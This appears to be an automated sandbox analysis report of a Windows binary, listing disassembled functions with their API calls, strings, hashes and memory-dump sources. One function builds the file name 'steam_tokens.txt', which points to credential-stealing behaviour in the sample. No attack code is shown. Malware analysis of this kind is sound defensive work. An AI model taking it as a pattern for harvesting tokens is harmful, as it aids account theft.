                                  • Opcode Fuzzy Hash: b37a3544bed2f59778fa344e40790802ebc53a75cb27e585bc622c70071c0bc0
                                  • Instruction Fuzzy Hash: AD418271E0220A9BDB22EF68DCA57EF77B4AF54304F0545A5E915AB2A3DE30ED04C790
                                  Function 0031E9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0031EA24
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031EA53
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031EA61
                                  • lstrcat.KERNEL32(?,00331794), ref: 0031EA7A
                                  • lstrcat.KERNEL32(?,01028880), ref: 0031EA8D
                                  • lstrcat.KERNEL32(?,00331794), ref: 0031EA9F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: bcb831062ffbbc831469a63f5c20f05fb3a81b4cce8677c2365cb15d5db6d17a
                                  • Instruction ID: 1b09453b2d59518c6f9b7436516dc30ecf111260afaf48982c11f62bf6cc60f5
                                  • Opcode Fuzzy Hash: bcb831062ffbbc831469a63f5c20f05fb3a81b4cce8677c2365cb15d5db6d17a
                                  • Instruction Fuzzy Hash: 44419A71A11119ABCB16EF64DC55EEE7378FF58300F004454FA169B390DE709E989B90
                                  Function 0031ECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031ECDF
                                  • lstrlen.KERNEL32(00000000), ref: 0031ECF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031ED1D
                                  • lstrlen.KERNEL32(00000000), ref: 0031ED24
                                  • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0031ED52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: steam_tokens.txt
                                  • API String ID: 367037083-401951677
                                  • Opcode ID: b631cb0344badf597b285c74d1c4b71f2af2a2c27c3800e26fbe0275f4f89164
                                  • Instruction ID: 8a6b5371e369cabe599932a6eec82278129423a089893159002e511f57f320e3
                                  • Opcode Fuzzy Hash: b631cb0344badf597b285c74d1c4b71f2af2a2c27c3800e26fbe0275f4f89164
                                  • Instruction Fuzzy Hash: 7D318931A125155BC723BB78EC5EAAF7BA8AF14700F051020F846DF292DF25DD6A8BC1
                                  Function 00309A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0030140E), ref: 00309A9A
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0030140E), ref: 00309AB0
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,0030140E), ref: 00309AC7
                                  • ReadFile.KERNEL32(00000000,00000000,?,0030140E,00000000,?,?,?,0030140E), ref: 00309AE0
                                  • LocalFree.KERNEL32(?,?,?,?,0030140E), ref: 00309B00
                                  • CloseHandle.KERNEL32(00000000,?,?,?,0030140E), ref: 00309B07
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 52a280cabcad714fbde1ba34bcaf0aa2b6b594579dd4a6e50b9237e10a59f6e7
                                  • Instruction ID: d8323091c9e065cdb0221b49191e6b62e311f0adb272e22d9dac42c17b73959d
                                  • Opcode Fuzzy Hash: 52a280cabcad714fbde1ba34bcaf0aa2b6b594579dd4a6e50b9237e10a59f6e7
                                  • Instruction Fuzzy Hash: C8115BB1605209AFEB12DFA9DCD8BBA736CEB54350F11025AF901A72C1EB709D14CBA0
                                  Function 00325AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00325B14
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A188
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A1AE
                                  • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00325B7C
                                  • memmove.MSVCRT(00000000,?,?), ref: 00325B89
                                  • memmove.MSVCRT(00000000,?,?), ref: 00325B98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long
                                  • API String ID: 2052693487-3788999226
                                  • Opcode ID: 37ee37b113a4cb21e7d739276a1a031021e705e70bf9cc8f046a8d3e7f896301
                                  • Instruction ID: b401c78f75349a26eaf1f10fbf92d314d278a87cd666f17851ec0d90be17d6fa
                                  • Opcode Fuzzy Hash: 37ee37b113a4cb21e7d739276a1a031021e705e70bf9cc8f046a8d3e7f896301
                                  • Instruction Fuzzy Hash: 63417271B005299FCF09DF6CD891AAEB7B5EB88310F158229E905E7344E630DD01CB90
                                  Function 003290DD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Typememset
                                  • String ID:
                                  • API String ID: 3530896902-3916222277
                                  • Opcode ID: 8681fe411ba2026c3059633b6842d4d522f5d9845aecf0428f709eea355abe15
                                  • Instruction ID: a7df82cf619257ae858c691499ed81fda70196523899f57fb3ee20de02f4ddeb
                                  • Opcode Fuzzy Hash: 8681fe411ba2026c3059633b6842d4d522f5d9845aecf0428f709eea355abe15
                                  • Instruction Fuzzy Hash: 52412A7050076CAEDB338B25DC85FFB7BFC9F45304F1448E9E98686182E271AA448F60
                                  Function 00317D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00317D58
                                    • Part of subcall function 0032A1C0: std::exception::exception.LIBCMT ref: 0032A1D5
                                    • Part of subcall function 0032A1C0: std::exception::exception.LIBCMT ref: 0032A1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00317D76
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00317D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                  • String ID: invalid string position$string too long
                                  • API String ID: 3310641104-4289949731
                                  • Opcode ID: 7379f1416ff4876b369f21e679aca98d1635e03015ac8cd61c69a062721fde76
                                  • Instruction ID: 95d1497ec3567d58cd5bce38017ada4f7f6937f195f8b4d850ca0df8d555e5b6
                                  • Opcode Fuzzy Hash: 7379f1416ff4876b369f21e679aca98d1635e03015ac8cd61c69a062721fde76
                                  • Instruction Fuzzy Hash: 4921E9313146044BD72ADE2CE881A7AF7F5AF95750F254A6EE4418B241D770DC808761
                                  Function 003233C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003233EF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003233F6
                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00323411
                                  • wsprintfA.USER32 ref: 00323437
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB
                                  • API String ID: 2922868504-2651807785
                                  • Opcode ID: 28a6f28b6c13a08518b30c4dd12199d56552df636e8bd114ceef6c4216ae97c2
                                  • Instruction ID: 5c249e57055f7f2a3f6cd03ce4a9c0d5a02ddeda6b14d7a77ade811118fcd64b
                                  • Opcode Fuzzy Hash: 28a6f28b6c13a08518b30c4dd12199d56552df636e8bd114ceef6c4216ae97c2
                                  • Instruction Fuzzy Hash: AD01D8B1A04614AFDB05DF98DD49BAEB7BCFB44710F000229FA06E7380D7B4590086A5
                                  Function 0032926D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit$__getptdfree
                                  • String ID: Xu3$Xu3
                                  • API String ID: 2640026729-2422181198
                                  • Opcode ID: e78314404a3d4ef5914ac26b41e991cf2c386cf131a5bea013b3175270d9808a
                                  • Instruction ID: 5a8a2a20e0ed31b7818b87c0e5795ccd0df854689cfab24d14bc4066a1dde012
                                  • Opcode Fuzzy Hash: e78314404a3d4ef5914ac26b41e991cf2c386cf131a5bea013b3175270d9808a
                                  • Instruction Fuzzy Hash: BD018432D06B39F7D623EB69B44679EB3547F01B10F160516E4046B680CB246D41DBD5
                                  Function 00322400 Relevance: 7.7, APIs: 6, Instructions: 234stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlenmemset
                                  • String ID:
                                  • API String ID: 3212139465-0
                                  • Opcode ID: 9fefb147073165d1f4494d33f05aa0a4e414f6327adb8dfa39e2d0929b6640bf
                                  • Instruction ID: 7c17f97025e356e119224c3f6eecaaebdc305fcc39eb9cb53ee447176a126f66
                                  • Opcode Fuzzy Hash: 9fefb147073165d1f4494d33f05aa0a4e414f6327adb8dfa39e2d0929b6640bf
                                  • Instruction Fuzzy Hash: 238102B1E00215ABDB15DF95EC44BAFB7B5BF94300F248069E908AB381EB759D46CF90
                                  Function 00317EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00317F31
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00317F60
                                  • StrCmpCA.SHLWAPI(00000000,00334C3C), ref: 00317FA5
                                  • StrCmpCA.SHLWAPI(00000000,00334C3C), ref: 00317FD3
                                  • StrCmpCA.SHLWAPI(00000000,00334C3C), ref: 00318007
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
